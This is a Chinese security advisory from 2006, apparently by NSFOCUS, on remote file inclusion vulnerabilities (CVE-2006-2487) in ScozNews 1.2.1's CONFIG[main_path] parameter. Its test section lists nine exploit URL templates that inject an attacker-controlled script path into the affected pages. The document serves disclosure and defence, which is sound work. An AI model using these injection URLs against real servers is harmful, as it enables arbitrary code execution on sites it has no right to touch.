首页 -> 安全研究

安全研究

安全漏洞
ScozNet ScozNews多个远程文件包含漏洞

发布日期:2006-05-18
更新日期:2006-05-18

受影响系统:
ScozNet ScozNews v1.2.1
描述:
BUGTRAQ  ID: 18027
CVE(CAN) ID: CVE-2006-2487

ScozNews是一款新闻管理系统。

ScozNews处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

ScozNews的多个脚本没有正确验证“CONFIG[main_path]”参数的输入,允许攻击者通过包含本地或外部资源的文件执行任意PHP代码。

受影响的脚本包括:

sources/functions.php
sources/help.php
sources/mail.php
sources/news.php
sources/template.php
sources/Admin/admin_cats.php
sources/Admin/admin_edit.php
sources/Admin/admin_import.php
sources/Admin/admin_templates.php

成功攻击要求启用了register_globals。

<*来源:Kacper (kacper1964@yahoo.pl
  
  链接:http://secunia.com/advisories/20156/print/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]

建议:
厂商补丁:

ScozNet
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.scoznet.com/

浏览次数:4072
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障